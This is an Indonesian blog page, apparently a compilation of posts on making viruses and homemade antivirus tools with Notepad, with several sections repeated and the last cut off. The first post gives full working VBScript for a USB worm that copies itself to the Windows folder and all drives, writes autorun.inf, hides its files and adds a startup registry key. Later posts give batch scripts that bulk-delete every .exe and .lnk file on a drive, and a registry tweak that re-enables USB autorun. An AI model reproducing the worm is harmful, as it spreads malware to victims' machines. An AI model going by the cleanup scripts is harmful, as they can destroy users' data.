Kesel banget dah yah, kalau komputer atau fd (Flashdisk) kita kena virus, tapi sekarang saya punya cara yang mungkin bisa sedikit menghibur dan menambah pengetahuan kita...
Saya pernah ingin tahu dari mana asal virus itu dan bagaimana cara membuatnya, ketika saya searching di google ternyata saya mendapatkan apa yang saya mau yaitu membuat virus sederhana hanya dengan menggunakan notepad saja, setelah mempelajari itu saya akan berbagi kepada kalian semua yaitu pengunjung setia blog saya.
Oke, langsung ke proses pembuatannya aja yah...:
- Buka Notepad di komputer anda
- copy script dibawah ini
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Davit Wahyudi"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
- Klik File => Save As => All Files
catatan: file harus dengan extensi .vbs contoh: KuROSaKi.vbs
Jadi deh virus mu sendiri...
Mau coba??Klik aja sendiri... Kerusakan ditanggung sendiri hehehe...
PENTING: Jangan digunakan untuk menjahili orang atau teman!!!!!!
Sabtu, 21 April 2012
buat anti virus menggunakan NOTEPAD
1. Open notepad > [start + R ] ketikkan Notepad. nah ni die cuplakannya
lalu ketik
mode 60,15
color 0a
cls
pause
Keterangan :
mode 60 itu karakternya
15 itu barisnya
akan terlihat seperti gambar dibawah ini :
kalo sudah menuliskan seperti kode diatas, trus save dengan nama file dengan ekstensi *.bat nama terserah sobat, misal : "kutujenggot.bat" di desktop.
ok. kalo sudah.. coba klik double filenya yang di desktop. Mantap toh.
2. trus cari tahu kalo ente colokin FD. drivenya apaan ? misalnya lughot punya pas fd dicolokin langsung terdetect F:\
lalu ke desktop klik kanan file "kutujenggot.bat" tadi lalu pilih edit
sesuai drive fd sobat!, maka tambahkan
"F:"
bisa diganti G:, X:, S: dsb.
untuk menghapus semua virus/file shortcut tambahkan
"del /q *.lnk"
untuk menghapus semua file exe (biasanya dah terinfeksi) tambahkan
"del /q *.exe"
waspadai file master yg g tersimpan dalam folder pasti terdelete
untuk menghapus file autorun.inf untuk file (kalo smadav biasanya bikin folder)tambahkan
"del /q *.inf"
biasanya virus jmn dlu masuk ke desktop.ini maka tambahin!
"del /q *.ini"
keterangan : /q itu agar perintahnya bisa dijalankan automatis. tidak ada pertanyaan "yakin akan menghapus [y/t]"
tampilannya seperti dibawah ini!
3. langkah selanjutnya adalah menghapus folder RECYCLER << tempat virus nongkrong dan System Volume Information << tempat info, biasanya sepupu virus juga nongkrong disini!
nah tambahin lagi
RMDIR /s /q RECYCLER << hapus folder recycler
RMDIR /s /q "System Volume Information" << pake tanda kutip!
tuk hapus folder autorun yang biasanya buatan smadav kodenya seperti dibawah ini :
RMDIR /s /q autorun.inf
keterangan :
rmdir tuk remove dir (hapus folder)
/s untuk semua folder dalam-dalamnya juga
/q ya sama dengan diatas....
tampilannya kayak gini :
finishing
trus SAVE [ctrl +s]
trus kata "pause" di delete aja...
Cara Menggunakannya :
1. pada saat mau masukin fd. minimize semua aplikasi yg aktif
2. siap2 tuk nge-klik kutujenggot.bat
3. matiin aja aplikasi yg bikin lemot (optional untuk komputer lemot)
4. pada saat fd dicolok... tunggu beberapa saat agar windows mendetect
5. kira-kira 3 sampe 5 detik windows mendetect.. jalankan "kutujenggot.bat"
setelah itu fd udah bisa langsung dibuka dengan klik double icon fd-nya or lewat explorer. nah kliatan tampilannya program mendelete beberapa file (kliatan agak heng). Demikianlah Cara Membuat Antivirus Sendiri, selamat mencoba dan semoga bermanfaat...
lalu ketik
mode 60,15
color 0a
cls
pause
Keterangan :
mode 60 itu karakternya
15 itu barisnya
akan terlihat seperti gambar dibawah ini :
kalo sudah menuliskan seperti kode diatas, trus save dengan nama file dengan ekstensi *.bat nama terserah sobat, misal : "kutujenggot.bat" di desktop.
ok. kalo sudah.. coba klik double filenya yang di desktop. Mantap toh.
2. trus cari tahu kalo ente colokin FD. drivenya apaan ? misalnya lughot punya pas fd dicolokin langsung terdetect F:\
lalu ke desktop klik kanan file "kutujenggot.bat" tadi lalu pilih edit
sesuai drive fd sobat!, maka tambahkan
"F:"
bisa diganti G:, X:, S: dsb.
untuk menghapus semua virus/file shortcut tambahkan
"del /q *.lnk"
untuk menghapus semua file exe (biasanya dah terinfeksi) tambahkan
"del /q *.exe"
waspadai file master yg g tersimpan dalam folder pasti terdelete
untuk menghapus file autorun.inf untuk file (kalo smadav biasanya bikin folder)tambahkan
"del /q *.inf"
biasanya virus jmn dlu masuk ke desktop.ini maka tambahin!
"del /q *.ini"
keterangan : /q itu agar perintahnya bisa dijalankan automatis. tidak ada pertanyaan "yakin akan menghapus [y/t]"
tampilannya seperti dibawah ini!
3. langkah selanjutnya adalah menghapus folder RECYCLER << tempat virus nongkrong dan System Volume Information << tempat info, biasanya sepupu virus juga nongkrong disini!
nah tambahin lagi
RMDIR /s /q RECYCLER << hapus folder recycler
RMDIR /s /q "System Volume Information" << pake tanda kutip!
tuk hapus folder autorun yang biasanya buatan smadav kodenya seperti dibawah ini :
RMDIR /s /q autorun.inf
keterangan :
rmdir tuk remove dir (hapus folder)
/s untuk semua folder dalam-dalamnya juga
/q ya sama dengan diatas....
tampilannya kayak gini :
finishing
trus SAVE [ctrl +s]
trus kata "pause" di delete aja...
Cara Menggunakannya :
1. pada saat mau masukin fd. minimize semua aplikasi yg aktif
2. siap2 tuk nge-klik kutujenggot.bat
3. matiin aja aplikasi yg bikin lemot (optional untuk komputer lemot)
4. pada saat fd dicolok... tunggu beberapa saat agar windows mendetect
5. kira-kira 3 sampe 5 detik windows mendetect.. jalankan "kutujenggot.bat"
setelah itu fd udah bisa langsung dibuka dengan klik double icon fd-nya or lewat explorer. nah kliatan tampilannya program mendelete beberapa file (kliatan agak heng). Demikianlah Cara Membuat Antivirus Sendiri, selamat mencoba dan semoga bermanfaat...
Basmi Virus Via Notepad
Pernahkah anda merasa diri anda seperti anti virus??? yeah itulah yang pernah gw rasa’in knapa???
bagaimana tidak, entah itu kawan rumah, kampuzzz bahkan kawan nongkrong pun kalo ada permasalahan dengan virus nanya_Nye ke Gw padahal dia tawu dengan pasti kalo OS Win*** gw ga’ pake AntiVirus, spontan gw jawab dengan nada bercanda “Emang_Nye Gw AntiVirus hehe”…Walaupun begitu gw cukup bangga ama diri gw sendiri hehehehe!!!!
Yang paling parah_Nye lagi, ada yang nekat bawa laptop_Nye keTempat Gw, Sepertinye Dia Yakin kalo gw bisa ngebasmi tuh virus padahal belum tentu(Menyedihkan)…
setelah gw terawang ternyata virus_Nye cuma virus kacangan, sehingga dengan bermodal notepad pun bisa dibersihin ampe tuntas Coz Virus_Nye kaga’ meng Handle CommandPrompt N Task Manager, but jika proses virus_Nye diMatiin lewat Task Manager ga’ bisa, karna ada dua proses yang running, kalo yang atu dimatiin maka yang atu lagi akan memanggil_Nye lagi….
untuk itu gw memanfaatkan notepad N gw tulis
@echo off
echo matiin proses virus_Nye
taskkill /F /IM namavirus1.exe /IM namavirus2.exe
echo apus Semua virus_Nye berdasarkan ukuran
for /R C:\ %%a in (*.exe) do if %%~za equ 157184 del /A: H S R A “%%a”
echo apus virus yang Nyamar
echo untuk drive c N subfolder_Nye
for /R C:\ %%a in (*.doc.exe) do del “%%a”
echo untuk drive d N subfolder_Nye
for /R D:\ %%a in (*.doc.exe) do del “%%a”
echo Ngembaliin Document yang diHidden
cd /d c:\
echo untuk drive C N subfolder_Nye
attrib *.doc -H -S -A /S
cd /d d:\
echo untuk drive D N subfolder_Nye
attrib *.doc -H -S -A /S
exit
gw simpen script tersebut dengan nama anjas.bat
Selesai dech tinggal normalin registry_Nye N terakhir gw cuma dapet ucapan thank’s N Semangkok Bakso Malang hehehe….
bagaimana tidak, entah itu kawan rumah, kampuzzz bahkan kawan nongkrong pun kalo ada permasalahan dengan virus nanya_Nye ke Gw padahal dia tawu dengan pasti kalo OS Win*** gw ga’ pake AntiVirus, spontan gw jawab dengan nada bercanda “Emang_Nye Gw AntiVirus hehe”…Walaupun begitu gw cukup bangga ama diri gw sendiri hehehehe!!!!
Yang paling parah_Nye lagi, ada yang nekat bawa laptop_Nye keTempat Gw, Sepertinye Dia Yakin kalo gw bisa ngebasmi tuh virus padahal belum tentu(Menyedihkan)…
setelah gw terawang ternyata virus_Nye cuma virus kacangan, sehingga dengan bermodal notepad pun bisa dibersihin ampe tuntas Coz Virus_Nye kaga’ meng Handle CommandPrompt N Task Manager, but jika proses virus_Nye diMatiin lewat Task Manager ga’ bisa, karna ada dua proses yang running, kalo yang atu dimatiin maka yang atu lagi akan memanggil_Nye lagi….
untuk itu gw memanfaatkan notepad N gw tulis
@echo off
echo matiin proses virus_Nye
taskkill /F /IM namavirus1.exe /IM namavirus2.exe
echo apus Semua virus_Nye berdasarkan ukuran
for /R C:\ %%a in (*.exe) do if %%~za equ 157184 del /A: H S R A “%%a”
echo apus virus yang Nyamar
echo untuk drive c N subfolder_Nye
for /R C:\ %%a in (*.doc.exe) do del “%%a”
echo untuk drive d N subfolder_Nye
for /R D:\ %%a in (*.doc.exe) do del “%%a”
echo Ngembaliin Document yang diHidden
cd /d c:\
echo untuk drive C N subfolder_Nye
attrib *.doc -H -S -A /S
cd /d d:\
echo untuk drive D N subfolder_Nye
attrib *.doc -H -S -A /S
exit
gw simpen script tersebut dengan nama anjas.bat
Selesai dech tinggal normalin registry_Nye N terakhir gw cuma dapet ucapan thank’s N Semangkok Bakso Malang hehehe….
Membuat Anti Virus Sederhana Menggunakan Visual Basic
Sekarang saya akan memberitahu bagaimana cara membuat anti virus menggunakan visual basic. pertama tool yang anda butuhkan adalah :
Kemudian Setelah Anda membuat form seperti ini, anda tinggal memasukkan kode-kode dalam bahasa visual basic agar software ini bisa berjalan. kodenya adalah seperti ini :
Option Explicit
Dim FSO As Object
Dim ArrMark(100) As String
Dim cnt As Integer
Private Sub Form_Load()
Dim FSO, ActDrv, FName As Object
Dim Codes, MarkPath, StrTemp, Tmp1, Tmp2 As String
Dim x As Integer
Set FSO = CreateObject("Scripting.FileSystemObject")
For Each ActDrv In FSO.Drives
Combo1.AddItem ActDrv
Next
On Error GoTo Hell
If Right(App.Path, 1) <> "\" Then
MarkPath = App.Path + "\vmark.txt"
Else
MarkPath = App.Path + "vmark.txt"
End If
Set FName = FSO.OPenTextFile(MarkPath, 1, False)
Codes = FName.ReadAll
cnt = 0: x = 0
For x = 1 To Len(Codes)
Tmp1 = Mid(Codes, x, 1)
StrTemp = StrTemp + Tmp1
If StrTemp = "#EOF" Then Exit For
If Tmp1 = Chr(13) Then
ArrMark(cnt) = StrTemp
StrTemp = ""
cnt = cnt + 1
End If
Tmp1 = ""
Next x
Exit Sub
Hell:
MsgBox "File" + Space(1) + Chr(39) + MarkPath + Chr(39) + Space(1) + "Tidak Ditemukan!"
End
End Sub
Function Dosearch(Path)
Set FSO = CreateObject("Scripting.FileSystemObject")
Dim Folder, Files, File, SubFolders, SubFolder As Object
Dim FName, Codes, Tmp1, Tmp2 As String
Dim x As Integer
On Error Resume Next
Set Folder = FSO.getfolder(Path)
Set Files = Folder.Files
For Each File In Files
If FSO.GetExtensionName(File.Path) = "vbs" + "H1N1.exe" Or FSO.GetExtensionName(File.Path) = "vbe" Then
On Error Resume Next
If GetAttr(File.Path) <> vbNormal Then SetAttr File.Path, vbNormal
Set FName = FSO.OPenTextFile(File.Path, 1, False)
Codes = FName.ReadAll
For x = 0 To cnt - 1
Tmp1 = Replace(ArrMark(x), Chr(10), "")
Tmp2 = Replace(Tmp1, Chr(13), "")
If InStr(LCase(Codes), LCase(Tmp2)) <> 0 And Tmp2 <> "" Then
List1.AddItem File.Path
Exit For
End If
Next x
End If
Next
Set SubFolders = Folder.SubFolders
For Each SubFolder In SubFolders
Dosearch SubFolder.Path
Next
End Function
Private Sub Command1_Click()
List1.Clear
Me.MousePointer = 11
Me.Caption = "BCC AntiVirus 2009 - Scanning.."
Command1.Enabled = False
Dosearch (Combo1.Text)
Command1.Enabled = True
Me.Caption = "BCC AntiVirus 2009"
Me.MousePointer = 0
End Sub
Private Sub Command2_Click()
On Error Resume Next
If List1.ListIndex > -1 Then
If MsgBox("Do You Want To Delete These File '" + List1.List(List1.ListIndex) + "' ?", vbYesNo + vbQuestion) = vbYes Then
Kill List1.List(List1.ListIndex)
List1.RemoveItem List1.ListIndex
End If
End If
End Sub
Private Sub Command3_Click()
If MsgBox("Are You Sure Want To Quit ?", vbQuestion + vbYesNo) = vbYes Then End
End Sub
Nah... Setelah Selesai Menuliskan Semua Kode yang Puanjangggg...... sekali ini, baru kita jalankan software...
Jika Kurang Ngerti, ya silahkan tanya aja langsung dengan cara komentar......
-Selamat Mencoba-
Kemudian Setelah Anda membuat form seperti ini, anda tinggal memasukkan kode-kode dalam bahasa visual basic agar software ini bisa berjalan. kodenya adalah seperti ini :
Option Explicit
Dim FSO As Object
Dim ArrMark(100) As String
Dim cnt As Integer
Private Sub Form_Load()
Dim FSO, ActDrv, FName As Object
Dim Codes, MarkPath, StrTemp, Tmp1, Tmp2 As String
Dim x As Integer
Set FSO = CreateObject("Scripting.FileSystemObject")
For Each ActDrv In FSO.Drives
Combo1.AddItem ActDrv
Next
On Error GoTo Hell
If Right(App.Path, 1) <> "\" Then
MarkPath = App.Path + "\vmark.txt"
Else
MarkPath = App.Path + "vmark.txt"
End If
Set FName = FSO.OPenTextFile(MarkPath, 1, False)
Codes = FName.ReadAll
cnt = 0: x = 0
For x = 1 To Len(Codes)
Tmp1 = Mid(Codes, x, 1)
StrTemp = StrTemp + Tmp1
If StrTemp = "#EOF" Then Exit For
If Tmp1 = Chr(13) Then
ArrMark(cnt) = StrTemp
StrTemp = ""
cnt = cnt + 1
End If
Tmp1 = ""
Next x
Exit Sub
Hell:
MsgBox "File" + Space(1) + Chr(39) + MarkPath + Chr(39) + Space(1) + "Tidak Ditemukan!"
End
End Sub
Function Dosearch(Path)
Set FSO = CreateObject("Scripting.FileSystemObject")
Dim Folder, Files, File, SubFolders, SubFolder As Object
Dim FName, Codes, Tmp1, Tmp2 As String
Dim x As Integer
On Error Resume Next
Set Folder = FSO.getfolder(Path)
Set Files = Folder.Files
For Each File In Files
If FSO.GetExtensionName(File.Path) = "vbs" + "H1N1.exe" Or FSO.GetExtensionName(File.Path) = "vbe" Then
On Error Resume Next
If GetAttr(File.Path) <> vbNormal Then SetAttr File.Path, vbNormal
Set FName = FSO.OPenTextFile(File.Path, 1, False)
Codes = FName.ReadAll
For x = 0 To cnt - 1
Tmp1 = Replace(ArrMark(x), Chr(10), "")
Tmp2 = Replace(Tmp1, Chr(13), "")
If InStr(LCase(Codes), LCase(Tmp2)) <> 0 And Tmp2 <> "" Then
List1.AddItem File.Path
Exit For
End If
Next x
End If
Next
Set SubFolders = Folder.SubFolders
For Each SubFolder In SubFolders
Dosearch SubFolder.Path
Next
End Function
Private Sub Command1_Click()
List1.Clear
Me.MousePointer = 11
Me.Caption = "BCC AntiVirus 2009 - Scanning.."
Command1.Enabled = False
Dosearch (Combo1.Text)
Command1.Enabled = True
Me.Caption = "BCC AntiVirus 2009"
Me.MousePointer = 0
End Sub
Private Sub Command2_Click()
On Error Resume Next
If List1.ListIndex > -1 Then
If MsgBox("Do You Want To Delete These File '" + List1.List(List1.ListIndex) + "' ?", vbYesNo + vbQuestion) = vbYes Then
Kill List1.List(List1.ListIndex)
List1.RemoveItem List1.ListIndex
End If
End If
End Sub
Private Sub Command3_Click()
If MsgBox("Are You Sure Want To Quit ?", vbQuestion + vbYesNo) = vbYes Then End
End Sub
Nah... Setelah Selesai Menuliskan Semua Kode yang Puanjangggg...... sekali ini, baru kita jalankan software...
Jika Kurang Ngerti, ya silahkan tanya aja langsung dengan cara komentar......
-Selamat Mencoba-
Cara Membuat Anti Virus DI USB FlashDisk
Jengkel dengan Virus yang otomatis menginfeksi Flash Disk Anda saat Anda colokkan USB Flash Disk Anda ke port komputer yang terinfeksi virus?
Bagaimana tidak kita akali saja dengan Membuat Anti Virus AutoRun dari USB Removable Drive semacam Flash Disk?
Seringkali Virus akan membuat file “autorun.inf” yang ber-attribute file hidden dan system (dan/atau bisa juga termasuk file virus/trojan - server) begitu Anda memasangkan Flask Disk yang dijadikan target penginfeksian virus ataupun target pengintipan aktivitas user atau pencurian data user dengan Trojan.
file autorun.inf inilah command atau pemicu tereksekusinya file induk dan library virus/trojan yang sudah bersarang di komputer lokal atau jaringan tempat Flash Disk Anda berinteraksi dan berhubungan langsung.
Bila Anda pengguna OS Windows, seperti kita ketahui, Versi Windows sebelum generasi Windows Vista (termasuk Windows Windows XP), secara default tidak mengijinkan proses “AutoRun” executable files dari media USB Removable Drives seperti External Hardisk ataupun Flash Drive/Flash Disk (kecuali dari media cakram digital) yang kemungkinan besar ditujukan untuk kepentingan keamanan. Windows hanya mengijinkan proses “AutoPlay” media saja seperti AutoPlay Movie/Music dari DVD atau command seperti Open/View file melalui windows explorernya.
Untungnya (dari faktor kemudahan) sekaligus sayangnya (dari faktor keamanan), Windows Vista secara default telah memperkenankan proses “AutoRun” dilangsungkan dengan dafault opsi yang bisa Anda pilih secara permanen.
Lalu bagaimana mengakali Windows XP agar bisa mengijinkan proses “AutoRun” executable files dari removable drives seperti External Hardisk maupun Flash Disk?
Di bawah ini Penulis sampaikan teknis pembuatan AutoRun AntiVirus pada Flash Disk.
LANGKAH I - Download ANtiVirus yang bersifat Portable
Kenapa harus Portable? Karena tujuan dari pembuatan AutoRun File dari Flash juga bersifat portable, jadi program rujukan, dalam hal ini Anti Virus, bisa dijalankan langsung dari Flash Drive tanpa diperlukan instalasi.
Anda bisa menggunakan ANSAV (Ansav.exe - jangan ANSAV Security Guard) atau PCMAV (PCMAV-CLN.EXE - Jangan PCMAV-RTP.EXE)
Masukkan file Anti Virus Portable (plus file library pendukungnya - bila ada) tersebut ke dalam Flash Disk Anda. Dalam contoh kali ini, untuk mempermudah, letakkan saja di Root Flash Disk Anda tanpa perlu Anda masukkan ke dalam folder.
LANGKAH II - Pembuatan AutoRun Dari Flash Disk
Ada 2 (dua) opsi yang bisa Anda pilih:
1. Menggunakan bantuan software orang lain, atau
2. Menggunakan bantuan tangan Anda sendiri
1. Menggunakan bantuan software orang lain
Nomor ini tidak akan menjadi bahan pembicaraan inti pada Artikel ini.
Namun bila Anda menghendaki, Penulis merekomendasikan Anda untuk menggunakan aplikasi bernama APO USB AutoRun yang sangat bagus dan berkualitas, berfungsi dengan baik pada Windows XP SP2, berukuran file kecil, dan gratis lagi.
APO AutoRun USB akan membuat service bernama autorunusb.exe yang berjalan di background sebagai detektor yang bertugas memindai file autorun.inf pada root removable drive dan mendeteksi semua executable files pada media removable drive serta akan mencocokkan executable files tersebut dengan file name dan path file yang dirujuk oleh file autorun.inf tersebut.
Yang penulis heran dari software ini, APO tetap akan melakukan scan pada seluruh executable files yang ada pada media removable drives.
Namun, walau efeknya sedikit memperlambat kinerja komputer, proses scanning tersebut Penulis cermati dan rasakan sangat bermanfaat juga untuk memindai keberadaan Virus pada Removable Drives yang belum sempat terdeteksi oleh AntiVirus yang aktif di komputer. Begitu proses scanning menemukan suatu executable files atau script yang dianggap sebagai malware oleh AntiVirus tersebut, maka akan memicu (trigger) notifikasi dari AntiVirus bahwa telah ditemukan threat (virus).
Sayangnya APO AutoRun USB harus Anda install dulu sebelum Anda bisa mengaplikasikan AutoRun dari flash disk. Untungnya APO AutoRun USB juga telah menyertakan instalasi untuk keperluan portable plus autorun.inf builder.
2. Menggunakan bantuan tangan Anda sendiri
Teknik yang bisa Anda lakukan adalah pertama-tama dengan sedikit mengubah struktur HEX pada Windows Registry.
Bila sebelumnya atau secara default Windows tidak mengijinkan proses “AutoRun” dari USB Flash Disk, maka Registry-nya seperti ini:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer]
“NoDriveTypeAutoRun”=dword:00000095
Agar Windows bisa mengijinkan proses “AutoRun” dari USB Flash Disk, maka ubah Registrynya menjadi:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer]
“NoDriveTypeAutoRun”=dword:00000091
Anda bisa mengCopy Registry Lines tersebut, lalu Anda simpan sebagai (misal): “AutoRun_Removable_Media_Enable.reg” untuk Anda Klik kanan dan Merge (gabungkan) dengan Windows Registry Database.
Setelah Anda berhasil memasukkan Registry Entry Files ke dalam Windows Registry Database, maka pekerjaan Anda yang terakhir adalah membuat file “autorun.inf” yang berfungsi sebagai Command dengan rujukan ke File Anti Virus yang telah Anda download dan masukkan ke dalam Flash Disk Anda (pada Langkah I)
Dalam contoh ini, Penulis menggunakan PC Media Anti Virus PCMAV-CLN.EXE yang filenamenya telah Penulis ubah menjadi PCM4V-CL34N32.EXE guna menghindari pendeteksian Virus yang dimungkinkan akan memblokir PCMAV-CLN.EXE.
Maka file “autorun.inf” PCMAV menjadi seperti ini:
PC Media Anti Virus
[AutoRun]
open=PCM4V-CL34N32.EXE
icon=PCMAV.ICO
shellexecute=PCM4V-CL34N32.EXE
shell\Scan Virus\command=PCM4V-CL34N32.EXE
shell=Scan Virus
Salin baris-baris INF tersebut, dan simpan sebagai .INF file dengan nama “autorun.inf” (tanpa tanda kutip), kemudian letakkan file “autorun.inf” tersebut pada Root Flash Disk Anda.
KETERANGAN
* Untuk file ICON dari PCMAV, Penulis extract dari file PCMAV-CLN.EXE, yang mana ICON file tersebut juga ditempatkan pada Root Flash Disk. Anda bisa menghilangkan/menghapus baris “icon=PCMAV.ICO” yang digunakan untuk memunculkan ICON File PCMAV sebagai Icon penanda Flash Disk seperti pada screenshot di atas. Baris rujukan ICON ini tidak mempengaruhi proses AutoRun. Namun bila Anda menginginkan PCMAV ICON tersebut, Anda bisa mendownloadnya dengan klik link ini.
* Baris-baris INF tersebut bisa Anda modifikasi sesuai selera tulisan Anda, yang penting path file Anda tidak salah; file tujuan Anda rujuk secara relatif.
* Jangan Lupa, untuk menghindari terhapusnya file dengan begitu mudahnya, sebaiknya sembunyikan saja File Anti Virus berserta library file pendukungnya (bila ada) maupun file “autorun.inf”nya dengan mengeset File Attributnya dengan “hidden” dan bila perlu “system”. Satu rekomendasikan lagi, alangkah baiknya, semua File tersebut Set File Attributenya menjadi “Read Only” agar, secara sederhana, tidak bisa termodifikasi.
Untuk keperluan setting modifikasi File Attribute terbut Anda bisa melakukannya dengan Select All files yang akan disembunyikan, lalu klik kanan file-file tersebut, pilik dan klik “properties”, dan beri tanda centang pada check box “hidden. Sedang untuk set menjadi “system”, Anda bisa menggunakan Windows ATTRIB.EXE di lingkungan kerja DOS atau Anda bisa juga menggunakan Attribute Changer yang berlingkungan kerja GUI. Q = Lho, katanya ga pake tool ya? A = untuk mudahnya, gunakan Attribute Changer bila ATTRIB.EXE dirusak/dihapus Virus/Admin dan Anda malas untuk extract dari Windows CAB
Bagaimana tidak kita akali saja dengan Membuat Anti Virus AutoRun dari USB Removable Drive semacam Flash Disk?
Seringkali Virus akan membuat file “autorun.inf” yang ber-attribute file hidden dan system (dan/atau bisa juga termasuk file virus/trojan - server) begitu Anda memasangkan Flask Disk yang dijadikan target penginfeksian virus ataupun target pengintipan aktivitas user atau pencurian data user dengan Trojan.
file autorun.inf inilah command atau pemicu tereksekusinya file induk dan library virus/trojan yang sudah bersarang di komputer lokal atau jaringan tempat Flash Disk Anda berinteraksi dan berhubungan langsung.
Bila Anda pengguna OS Windows, seperti kita ketahui, Versi Windows sebelum generasi Windows Vista (termasuk Windows Windows XP), secara default tidak mengijinkan proses “AutoRun” executable files dari media USB Removable Drives seperti External Hardisk ataupun Flash Drive/Flash Disk (kecuali dari media cakram digital) yang kemungkinan besar ditujukan untuk kepentingan keamanan. Windows hanya mengijinkan proses “AutoPlay” media saja seperti AutoPlay Movie/Music dari DVD atau command seperti Open/View file melalui windows explorernya.
Untungnya (dari faktor kemudahan) sekaligus sayangnya (dari faktor keamanan), Windows Vista secara default telah memperkenankan proses “AutoRun” dilangsungkan dengan dafault opsi yang bisa Anda pilih secara permanen.
Lalu bagaimana mengakali Windows XP agar bisa mengijinkan proses “AutoRun” executable files dari removable drives seperti External Hardisk maupun Flash Disk?
Di bawah ini Penulis sampaikan teknis pembuatan AutoRun AntiVirus pada Flash Disk.
LANGKAH I - Download ANtiVirus yang bersifat Portable
Kenapa harus Portable? Karena tujuan dari pembuatan AutoRun File dari Flash juga bersifat portable, jadi program rujukan, dalam hal ini Anti Virus, bisa dijalankan langsung dari Flash Drive tanpa diperlukan instalasi.
Anda bisa menggunakan ANSAV (Ansav.exe - jangan ANSAV Security Guard) atau PCMAV (PCMAV-CLN.EXE - Jangan PCMAV-RTP.EXE)
Masukkan file Anti Virus Portable (plus file library pendukungnya - bila ada) tersebut ke dalam Flash Disk Anda. Dalam contoh kali ini, untuk mempermudah, letakkan saja di Root Flash Disk Anda tanpa perlu Anda masukkan ke dalam folder.
LANGKAH II - Pembuatan AutoRun Dari Flash Disk
Ada 2 (dua) opsi yang bisa Anda pilih:
1. Menggunakan bantuan software orang lain, atau
2. Menggunakan bantuan tangan Anda sendiri
1. Menggunakan bantuan software orang lain
Nomor ini tidak akan menjadi bahan pembicaraan inti pada Artikel ini.
Namun bila Anda menghendaki, Penulis merekomendasikan Anda untuk menggunakan aplikasi bernama APO USB AutoRun yang sangat bagus dan berkualitas, berfungsi dengan baik pada Windows XP SP2, berukuran file kecil, dan gratis lagi.
APO AutoRun USB akan membuat service bernama autorunusb.exe yang berjalan di background sebagai detektor yang bertugas memindai file autorun.inf pada root removable drive dan mendeteksi semua executable files pada media removable drive serta akan mencocokkan executable files tersebut dengan file name dan path file yang dirujuk oleh file autorun.inf tersebut.
Yang penulis heran dari software ini, APO tetap akan melakukan scan pada seluruh executable files yang ada pada media removable drives.
Namun, walau efeknya sedikit memperlambat kinerja komputer, proses scanning tersebut Penulis cermati dan rasakan sangat bermanfaat juga untuk memindai keberadaan Virus pada Removable Drives yang belum sempat terdeteksi oleh AntiVirus yang aktif di komputer. Begitu proses scanning menemukan suatu executable files atau script yang dianggap sebagai malware oleh AntiVirus tersebut, maka akan memicu (trigger) notifikasi dari AntiVirus bahwa telah ditemukan threat (virus).
Sayangnya APO AutoRun USB harus Anda install dulu sebelum Anda bisa mengaplikasikan AutoRun dari flash disk. Untungnya APO AutoRun USB juga telah menyertakan instalasi untuk keperluan portable plus autorun.inf builder.
2. Menggunakan bantuan tangan Anda sendiri
Teknik yang bisa Anda lakukan adalah pertama-tama dengan sedikit mengubah struktur HEX pada Windows Registry.
Bila sebelumnya atau secara default Windows tidak mengijinkan proses “AutoRun” dari USB Flash Disk, maka Registry-nya seperti ini:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer]
“NoDriveTypeAutoRun”=dword:00000095
Agar Windows bisa mengijinkan proses “AutoRun” dari USB Flash Disk, maka ubah Registrynya menjadi:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer]
“NoDriveTypeAutoRun”=dword:00000091
Anda bisa mengCopy Registry Lines tersebut, lalu Anda simpan sebagai (misal): “AutoRun_Removable_Media_Enable.reg” untuk Anda Klik kanan dan Merge (gabungkan) dengan Windows Registry Database.
Setelah Anda berhasil memasukkan Registry Entry Files ke dalam Windows Registry Database, maka pekerjaan Anda yang terakhir adalah membuat file “autorun.inf” yang berfungsi sebagai Command dengan rujukan ke File Anti Virus yang telah Anda download dan masukkan ke dalam Flash Disk Anda (pada Langkah I)
Dalam contoh ini, Penulis menggunakan PC Media Anti Virus PCMAV-CLN.EXE yang filenamenya telah Penulis ubah menjadi PCM4V-CL34N32.EXE guna menghindari pendeteksian Virus yang dimungkinkan akan memblokir PCMAV-CLN.EXE.
Maka file “autorun.inf” PCMAV menjadi seperti ini:
PC Media Anti Virus
[AutoRun]
open=PCM4V-CL34N32.EXE
icon=PCMAV.ICO
shellexecute=PCM4V-CL34N32.EXE
